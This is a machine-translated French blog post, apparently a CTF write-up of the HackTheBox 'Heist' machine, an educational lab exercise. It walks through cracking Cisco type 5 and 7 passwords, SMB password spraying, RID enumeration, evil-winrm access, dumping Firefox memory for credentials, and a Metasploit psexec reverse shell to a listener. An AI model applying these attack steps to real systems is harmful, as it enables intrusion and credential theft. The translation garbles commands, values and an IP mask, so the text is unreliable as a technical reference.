J'ai essayé de déchiffrer les mots de passe chiffrés (type 5, type 7) réglé sur mon appareil Cisco! Hackthebox Wheist WriteUp
L'URL a été copiée!
Cette fois, nous essaierons de casser le mot de passe de cryptage défini sur le périphérique Cisco et de pénétrer dans le serveur. "HackThebox-Heist: https://www.hackthebox.com/machines/heist "
┌fiques (hack_lab㉿desktop-o3rmu7h) - [~ / hackthebox] └sé Pour 10.129.121.71, l'hôte est en hausse (latence de 0,42 s). Port State Service Version 80 / TCP Open HTTP Microsoft IIS Httpd 10.0 | HTTP-Cookie-Flags: | /: | PhpSessid: | _ Httponly Indicateur non défini | HTTP-Methods: | _ Méthodes potentiellement risquées: Trace | http-title: support Page de connexion | _Requée la ressource était login.php | _http-server-header: Microsoft-IIS / 10.0 135 / TCP Open MSRPC Microsoft RPC 445 / TCP Open Microsoft-DD? 5985 / TCP Open HTTP Microsoft Httpapi Httpd 2.0 (SSDP / UPNP) | _HTTP-Title: Non trouvé | _HTTP-Server-Header: Microsoft-Httpapi / 2.0 49669 / TCP Open MSRPC Microsoft Windows RPC Info: OS: OS: Windows; CPE: CPE: / O: Microsoft: Résultats du script de l'hôte Windows: | _clock-skew: -1s | Mode de sécurité SMB2: | 3: 1: 1: | _ La signature du message est activée mais pas requise | SMB2-Time: | Date: 2023-09-12T00: 21: 17 | _ Start_Date: N / A Détection de service effectuée. Veuillez signaler tout résultat incorrect sur https://nmap.org/submit/. NMAP fait: 1 adresse IP (1 hôte) numérisé en 107,46 secondes
Il semble que HTTP, RPC, SMB et WinRM soient ouverts.
PORT
STATUT
SERVICE
80 / TCP
ouvrir
http
135 / TCP
ouvrir
PDSFPC
445 / TCP
ouvrir
Microsoft-DS
5985 / TCP
ouvrir
wsman
49669 / TCP
ouvrir
[inconnu]
HTTP (80 / TCP)
HTTP est ouvert, alors veuillez le vérifier. Il semble qu'il y ait une page de connexion ici.
J'ai essayé quelques choses, telles que "admin: admin" et "admin: mot de passe", mais je n'ai pas pu me connecter.
Il y a un "connexion en tant qu'invité" donc je vais essayer de vous connecter à l'invité.
Il y avait un article sur le routeur Cisco et il y avait un attachement.
Version 12.2 Pas de service de service de service de service de service! Type de commutation RNIS BASIC-5ESS! Nom d'hôte iOS-1! Mots de passe de sécurité Min-Length 12 Activer Secret 5 $ $ PDQG $ O8NRSZSGXEADUXRJLVKC91! nom d'utilisateur ROUT3R Mot de passe 7 0242114B0E143F015F5D1E161713 Privilège d'administration du nom d'utilisateur 15 02375012182C1A1D751618034F36415408! IP SSH Authentication-Retriers 5 IP SSH Version 2! ! Router BGP 100 Synchronisation BGP Log-Neighbor-Changes Bgp Daming Network 192.168.0.0. Masque 300.255.255.0 Timers BGP 3 9 Redistribué connecté! IP Classless IP Route 0.0.0.0 0.0.0.0 192.168.0.1! ! ACCESS-LIST 101 Permettre une IP de la liste IP de la liste de numéroteurs 1 101! Non IP HTTP Server Non IP HTTP Secure-Server! Ligne Vty 0 4 Session-Timeout 600 Autorisation Exec Ssh Transport Entrée SSH
Accéder à
Utilisons les informations du routeur Cisco mentionnées précédemment pour obtenir des droits d'accès.
Crackage de mot de passe
La pièce jointe contient l'énoncé suivant: Il se trouve au format Cisco Type 5.
! Mots de passe de sécurité Min-Length 12 Activer Secret 5 $ $ PDQG $ O8NRSZSGXEADUXRJLVKC91!
Il n'est pas possible de le décoder car il est haché par l'algorithme MD5 utilisé dans Activer Secret. J'essaierai de la force brute en utilisant John The Ripper.
┌── (hack_lab㉿desktop-o3rmu7h) - [~ / hackthebox] └sé Force les chargements comme ce type à la place en utilisant le codage d'entrée par défaut: UTF-8 chargé 1 Hash de mot de passe (MD5Crypt, crypte (3) $ $ (et variantes) [MD5 512/512 AVX512BW 16x3]) Status Stealth1agent (?) 3 1G 0: 00: 00: 17 Terminé (2023-09-10 17:35) 0.05763G / S 50550P / S 50550C / S 50550C / S STEATY !!!! 52513C/s 2346256..2334364 Waiting for 3 children to terminate 4 0g 0:00:00:59 DONE (2023-09-10 17:36) 0g/s 40471p/s 40471c/s 40471C/s babybillie..baby2626 2 0g 0:00:01:00 DONE (2023-09-10 17:36) 0g / s 54014p / s 54014c / s 54014c / s 1593572584561..1579468342 Utilisez l'option "--show" pour afficher toutes les session de mots de passe fissurées de manière fiable terminée.
J'ai ce mot de passe.
Steamth1Agent
Vient ensuite ce Cisco Type 7.
! nom d'utilisateur ROUT3R Mot de passe 7 0242114B0E143F015F5D1E161713 Privilège d'administration du nom d'utilisateur 15 02375012182C1A1D751618034F36415408!
Il y a un site de déchiffrement pour cela, donc je vais le déchiffrer ici.
Avec ces informations, je ne l'ai pas mise sur la page de connexion, donc je vais continuer la reconnaissance.
SMB (445 / TCP)
Vient ensuite la reconnaissance SMB, qui est ouverte à 445.
J'ai compilé les informations utilisateur et les informations de mot de passe que j'ai obtenues plus tôt.
┌fique
Utilisez CrackMapexex pour vérifier s'il existe des combinaisons d'utilisateurs et de mot de passe qui peuvent être connectées.
┌fique (hack_lab㉿desktop-o3rmu7h) - [~ / hackthebox] └fique Base de données de protocole [*] Initialisation de la base de données MSSQL Protocol [*] Initialisation de la base de données du protocole WinRM [*] Initialisation de la base de données du protocole LDAP [*] Initialisation de la base de données du protocole RDP [*] Copie de configuration par défaut [*] Génération du certificat SSL SMB 10.129.120.32 445 supportDesk [*] Windows 10.0 Build 17763 (Nom: supportDesk) (Domain: SupportDesk) (Signer: False) (SMBV1: FALSE) SMB 10.129.120.32 445 SupportDesk [-] SupportDesk \ Rout3r: $ userp @ sword status_logon_failure SMB 10.129.120.32 445 SupportDesk [-] SupportDesk \ Rout3r: Q4) Sju \ Y8QZ * A3? D Status_logon_Failure SMB 10.129.120.32 445 SupportDesk [-] SupportDesk \ Rout3r: Stealth1agent Status_Logon_Failure Smb 10.129.120.32 445 Status_logon_failure SMB 10.129.120.32 445 Supportdesk [-] supportdesk \ hazard: $ userp @ sword status_logon_failure smb 10.129.120.32 445 SupportDesk \ Hazard: Stealth1agent
Vous pouvez vous connecter en utilisant "Hazard: Stealth1agent".
┌til (hack_lab㉿desktop-o3rmu7h) - [~ / hackthebox] └─ $ smbclient -l \\\\\ 10.129.120.32 -u Mot de passe de danger pour [Workgroup \ Hazard]: ipc sharename commentaire ------ ---- Admin $ Disk Admin C $ Contrôle de défaut IPC $ ipc Remote Recc Recc Recc. DO_CONNECT: Connexion à 10.129.120.32 Échec (erreur nt_status_io_timeout) Impossible de se connecter avec SMB1 - aucun groupe de travail disponible
Vous pouvez vous connecter, mais comme vous ne pouvez pas accéder aux partages à l'aide de SMBClient, il ne semble pas y avoir d'informations particulières.
Le " Machine Sid " est automatiquement généré lorsque vous configurez votre ordinateur. Le débit (identifiant relatif) de l'administrateur intégré est fixé à "500" et le débarras de l'invité est fixé à "501". Les utilisateurs et les groupes Rids sont utilisés pour commencer par 1000
En d'autres termes, nous essaierons de consulter les utilisateurs avec un SID de 1000 ou plus.
┌fiques (hack_lab㉿desktop-o3rmu7h) - [~ / hackthebox] └fique pour i dans {1000..1050}; faire rpcclient -U 'Hazard% stealth1agent' 10.129.120.32 -c "Lookupsids S-1-5-21-4254423774-1266059056-3197185112- $ i" | grep -v inconnu; fait S-1-5-21-4254423774-1266059056-3197185112-1008 SupportDesk \ Hazard (1) S-1-5-21-4254423774-1266059056-3197185112-1009 SupportDesk \ Support (1) S-1-5-21-4254423774-1266059056-3197185112-1012 SupportDesk \ Chase (1) S-1-5-21-4254423774-1266059056-3197185112-1013 SupportDesk \ Jason (1))
Vous pouvez faire de même avec LookupSids.py!
Ajoutez de nouveaux utilisateurs aux utilisateurs que vous venez de créer.
┌fique
Avec ces informations, essayez à nouveau d'exécuter CrackMapExec.
Si vous rencontrez "Erreur: une erreur de type HttpClient :: ReceivEtimeouterror s'est produite, le message est exécuté expiré", vérifiez ici!
Essayez de vous connecter avec le mal-winrm.
┌── (hack_lab㉿desktop-o3rmu7h) - [~ / hackthebox] └fique Non configuré sur cette machine Données: Pour plus d'informations, consultez le github Evil Winrm: https://github.com/hackplayers/evil-winrm#remote-path-completion Info: établissant la connexion au point de terminaison distant * Evil-winrm * PS C: \ Users \ chase \ documents> Documents>
J'ai pu me connecter sans aucun problème! Il y a user.txt ici, alors entrez l'indicateur et vous avez terminé.
* Evil-winrm * PS C: \ Users \ Chase \ Desktop> LS Directory: C: \ Users \ Chase \ Desktop Mode LastWriteTime Longueur Nom ---- ---- - ---- ----- ----- --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- * Evil-winrm * PS C: \ Users \ Chase \ Desktop> cat todo.txt trucs to: 1. Continuez à vérifier la liste des problèmes. 2. Correction de la configuration du routeur. Terminé: 1. Accès restreint pour l'utilisateur invité. * Evil-winrm * PS C: \ Users \ Chase \ Desktop>
Élévation des privilèges
Je continuerai à essayer de promouvoir des privilèges comme celui-ci.
Obtenez le mot de passe à partir du vidage de processus
En regardant Todo.txt, Chase prévoit de vérifier la liste des problèmes
Une fois téléchargé, spécifiez votre ID Firefox et obtenez le vidage.
* Evil-winrm * PS C: \ Users \ Chase \ Desktop>. \ Procdump.exe -ma 6152 firefox.dmp procDump v11.0 - Sysinternals Process Dump Utility Copyright (c) 2009-2022 Mark Russinovich et Andrew Richard La filiale entièrement détenue de Microsoft Corporation) et vous, lisez-les. En utilisant le logiciel, vous acceptez ces termes. Si vous ne les acceptez pas, n'utilisez pas le logiciel. Si vous vous conformez à ces conditions de licence, vous avez les droits ci-dessous. Installation et droits de l'utilisateur Vous pouvez installer et utiliser un certain nombre de copies du logiciel sur vos appareils. Scope de licence Le logiciel est sous licence, non vendu. Cet accord vous donne uniquement des droits d'utilisation du logiciel. SysInternals réserve tous les autres droits. La loi applicable sans droits vous donne plus de droits cette limitation, vous pouvez utiliser le logiciel uniquement comme expressément autorisé dans le présent accord. * insensé, décompiler ou démonter le logiciel, sauf et seulement dans la mesure où la loi applicable a expressément autorisé dans le présent accord. * ingénieur à la recherche, décompiler ou démonter le logiciel, sauf et seulement dans la mesure où la loi applicable a expressément autorisé dans le présent accord. * Reverser, décompiler ou démonter le logiciel, sauf et seulement dans la mesure où la loi applicable a expressément autorisé dans le présent accord. * Faire plus de copies du logiciel que spécifié dans le présent accord ou autorisé par la loi applicable, destination cette limitation; * Publiez le logiciel pour que d'autres puissent copier; * Loyer, louer ou prêter le logiciel; * Transférer le logiciel ou le présent accord vers un tiers; ou * utiliser le logiciel pour les services d'hébergement de logiciels commerciaux. Informations sensibles Veuillez noter que, similaire à d'autres outils de débogage qui capturent les informations «de processus», les fichiers enregistrés par les outils Sysinternals peuvent inclure des informations personnellement identifiables ou d'autres informations sensibles (telles que les noms d'utilisateur, les mots de passe, les chemins de cheminement vers les fichiers accessibles et les chemins de reportage accessibles). En utilisant ce logiciel, vous reconnaissez que vous êtes conscient de ce SOGEMENT pour une utilisation personnellement identifiable ou d'autres informations sensibles pour les microsoft. Documentation Toute personne qui a un accès valable à votre ordinateur ou réseau interne peut copier et utiliser la documentation à vos fins de référence internes. Restrictions d'exportation Le logiciel est soumis aux lois et réglementations d'exportation des États-Unis. Vous devez vous conformer à toutes les lois et réglementations internationales d'exportation nationales et internationales qui s'appliquent aux logiciels. Ces lois incluent des restrictions sur les destinations, les utilisateurs finaux et l'utilisation finale. Pour des informations supplémentaires, voir www.microsoft.com / Exportation. Services de support parce que ce logiciel est "tel quel", nous ne pouvons pas fournir des services de support pour l'informatique. Contrat complet de cet accord, et les conditions des suppléments, des mises à jour, des services basés sur Internet et des services de support que vous utilisez, sont l'intégralité de l'accord pour les services de logiciel et de support. Loi applicable aux États-Unis. Si vous avez acquis les logiciels aux États-Unis, la loi de l'État de Washington régit l'interprétation du présent accord et s'applique aux réclamations pour violation de celle-ci, indépendamment des principes de conflit de lois. Les lois de l'État où vous vivez régissent toutes les autres réclamations, y compris les réclamations en vertu des lois sur la protection des consommateurs, les lois sur la concurrence déloyale et en délit. En dehors des États-Unis. Si vous avez acquis le logiciel dans tout autre pays, les lois de ce pays s'appliquent. Effet juridique Cet accord décrit certains droits légaux. Vous pouvez avoir d'autres droits en vertu des lois de votre pays. Vous pouvez également avoir des droits à l'égard de la partie dont vous avez acquis le logiciel. Cet accord ne change pas vos droits en vertu des lois de votre pays si les lois de votre pays ne le permettent pas. Avertissement de garantie Le logiciel est sous licence "As - est". Vous comportez le risque de l'utiliser. Sysinternals ne donne aucune garantie, garantie ou condition expresse. Vous pouvez avoir des droits supplémentaires sur les consommateurs en vertu de vos lois locales que le présent accord ne peut pas modifier. Dans l'étendue autorisée par vos lois locales, Sysinternals exclut les garanties mises en œuvre de qualité marchande, d'adéquation à des fins particulières et non. Limitation et exclusion des remèdes et des dommages que vous pouvez remettre de Sysinternals et ses fournisseurs ne sont que des dommages directs jusqu'à 5,00 $ US. Vous ne pouvez pas récupérer d'autres dommages, y compris les bénéfices perdus, perdus, spéciaux, indirects ou accidentels. Cette limitation s'applique à * tout ce qui concerne les logiciels, les services, le contenu (y compris le code) sur les sites Internet tiers ou les programmes tiers; et * réclamations pour rupture de contrat, violation de garantie, garantie ou condition, responsabilité stricte, négligence ou autre délit dans la mesure permise par la loi applicable. Elle s'applique également même si les sysinternals connus ou auraient dû savoir sur la possibilité des dommages. Veuillez noter: Comme ce logiciel est distribué au Québec, au Canada, certaines des clauses de cet accord sont fournies ci-dessous en français. Remarque: le CE Logiel est une conséquence des quatre ans - les quatre ans des quatre ans. Exonération de Garantie.Leave Logiciel Visé par une licence «Tel Quel» .toute Utilisation de ce Les autorités ne sont pas en mesure d'utiliser le système pour protéger le gouvernement local. Les autorités ne sont pas en mesure d'accéder au système d'une manière nécessaire pour que le gouvernement local protégeait le gouvernement local. Dommages - Interêts et Exclusion de Responsabilité pour les dommages. Vous Pouvez Obtenir de Sysinternals et de Sess Fournisseurs indemnisation en Cas de Dommages dirige l'unicité à Hauteur de 5,00 $ US. Vous Pouvez Prétendre à Autre Indemnisation pour les auteurs, y compliments dommages Spéciiux, indirects accessoires et pertes de bénéfices. CETTE Limitation Concern: Vantin Services, Services qui impliquent la contenance (Y Code gratuit) Figurant Sur Sites Les niveaux Internet sont basés sur les programmes; L'entreprise paie dans le but de restreindre la vie du peuple et les personnes qui se limitent aux personnes qui limitent leur vie. Effet Juridique. Moins de contraste Décrit certains dromes. Vous Pourrez Avoir d'Autres droes Prévus par les Lois de Votre paie. Il s'agit de la première exécution de ce programme. Vous devez accepter le CEUL pour continuer. Utilisez -ACCEPTEULA pour accepter Eula.
Si cela continue comme ça, il semble que ce ne sera pas possible. Tout d'abord, ils vous demandent de faire -Accepteula.
* Evil-winrm * PS C: \ Users \ Chase \ Desktop> ./procdump.exe -ACCEPTEULA ProcDump V11.0 - Sysinternals Dump Utility Copyright (c) 2009-2022 Mark Russinovich et Andrew Richards Sysinternals - www.sysinternals.com Moniters a procédé et écrit un fichier de vidage lorsque le processus dépasse le cracement ou les exercices.
Maintenant, je vais essayer d'obtenir un autre dépotoir.
Vérifiez les paramètres que vous devez définir dans les options.
MSF6> Utiliser Expoit / Windows / Smb / Psexec [*] Aucune charge utile configurée, défaillante vers Windows / MeterPreter / Reverse_TCP MSF6 Exploit (Windows / SMB / Psexec)> Options Options du module (Exploit / Windows / SMB / PSEXEC): Nom Réglage actuel DÉGLAGE DESCRIPTION --- ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Service_Description No Service Description à utiliser sur la cible pour joli listing Service_Display_name Non l'affichage du service Nom Service_name Non le nom du service smbDomain. Non Le domaine Windows à utiliser pour l'authentification smbpass Non le mot de passe du nom d'utilisateur spécifié smbshare non le partage auquel se connecter, peut être une part d'administration (admin $, c $, ...) ou un dossier de lecture / écriture normal SMBUSER Non le nom d'utilisateur pour authentifier la description - ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Target: nom d'identification - ---- 0 Affichage automatique des informations sur le module complet avec la commande d'informations ou d'informations -D.
Une fois les paramètres définis, essayez de fonctionner. En cas de succès, j'ai pu intensifier les privilèges en tapant Shell!
MSF6 Exploit (Windows / Smb / Psexec)> Exécuter [*] Démarré Handler TCP inversé le 10.10.16.6:4444 [*] 10.129.96.157:445 - Authenting au serveur ... [*] 10.129.96.157:445 - Authentification à 10.129.96.157:445 10.129.96.157:445 - Sélection de PowerShell Target [*] 10.129.96.157:445 - Exécution de la charge utile ... [+] 10.129.96.157:445 - SERVICE START OUT ONT OK Si exécutable ou non-service exécutable ... [*] Sending Stage (17566 Bytes) à 10.129.96.157 1 ouvert (10.10.16.6:4444 -> 10.129.96.157:49686) au 2023-09-12 08:06:48 +0900 METERPRETER> Shell Process 4760 créé. Canal 1 créé. Microsoft Windows [version 10.0.17763.437] (c) Microsoft Corporation 2018. Tous droits réservés. C: \ Windows \ System32> CD \ Users \ Administrator CD \ Users \ Administrator C: \ Users \ Administrator> CD Desktop CD Desktop C: \ Users \ Administrator \ Desktop> Dir Dir Volume in Drive C n'a pas d'étiquette. Le numéro de série volume est le répertoire FA65-CD36 de C: \ Users \ Administrator \ Desktop 02/18/2021 04:00 PM<DIR> . 18/02/2021 04h00<DIR> .. 09/12/2023 04:11 AM 34 root.txt 1 fichier (s) 34 octets 2 dir (s) 3,738,165,248 octets gratuits C: \ Users \ Administrator \ Desktop> Cat root.txt Cat root.txt 'Cat' n'est pas reconnu comme une commande interne ou externe, un programme opérable ou un fichier bac. C: \ Users \ Administrator \ Desktop> Type root.txt type root.txt cfd19444abeea6036035be9dcaf6cbb1 C: \ Users \ Administrator \ Desktop>
résumé
Cette fois, j'ai craqué le mot de passe de cryptage défini sur mon appareil Cisco et j'ai essayé de pénétrer dans le serveur. C'est un peu excitant de réfléchir à la façon dont il est possible de pirater des produits familiers! ! (mdr)
Ceci est un blog que j'ai commencé à étudier la sécurité de l'information. En tant que nouvel employé, je serais heureux si vous pouviez regarder avec un cœur large. Il y a aussi Teech Lab, qui est l'occasion d'étudier le plaisir en programmation, donc si vous êtes intéressé par le développement de logiciels, assurez-vous de jeter un œil!
Piétiner
![[Hackthebox] Que faire si "une erreur de type httpclient :: receivetimeouterror s'est produite, le message est exécuté expiré" apparaît dans Evil-winrm](https://hack-lab-256.com/wp-content/uploads/2023/09/hack-lab-256-samnail-4-300x169.jpg)
![[CVE-2015-3306] J'ai énuméré la samba partagée, manipulé une version vulnérable de ProfTPD et augmenté les privilèges en manipulant les variables de chemin! Tryhackme Kenobi écrit](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-2-300x169.jpg)
![[CTF permanent pour les débutants] Setodanote CTF web writeUp! Recommandé pour avoir un sentiment de CTF!](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-1-1-300x169.jpg)
![[Tryhackme] Nous avons effectué une analyse de paquets à l'aide de Wireshark pour étudier l'intrusion de SSH-Backdoor! SURPASS2 WRITEUP](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-300x169.jpg)
![[CVE-2018-16763] CMS CMS 1.4.1 - J'ai converti l'exécution du code distant (1) en Python 3 et je l'ai piraté! Tryhackme Ignite WRIPUP](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-25-300x169.jpg)
![[Tryhackme] J'ai utilisé SSH2John pour extraire le hachage de la clé privée et pira le mot de passe avec John the Ripper! SURPASS](https://hack-lab-256.com/wp-content/uploads/2023/07/hack-lab-256-samnail-24-300x169.jpg)
![[Tryhackme] J'ai essayé d'infiltrer une machine Windows avec une attaque RET2ESP (débordement de tampon)! Brainstorming writing](https://hack-lab-256.com/wp-content/uploads/2023/06/hack-lab-256-samnail-23-300x169.jpg)
![[CVE-2019-9053] J'ai essayé de le pirater en utilisant la vulnérabilité d'injection SQL dans CMS rendue simple! (Python3)](https://hack-lab-256.com/wp-content/uploads/2023/05/hack-lab-256-samnail-22-300x169.jpg)